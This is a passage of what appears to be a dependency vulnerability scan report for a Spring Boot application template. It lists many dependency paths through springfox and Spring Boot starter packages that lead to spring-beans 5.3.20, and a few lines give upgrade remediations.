  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-aop@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.4.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-jdbc@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.4.9.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-json@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.4.9.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
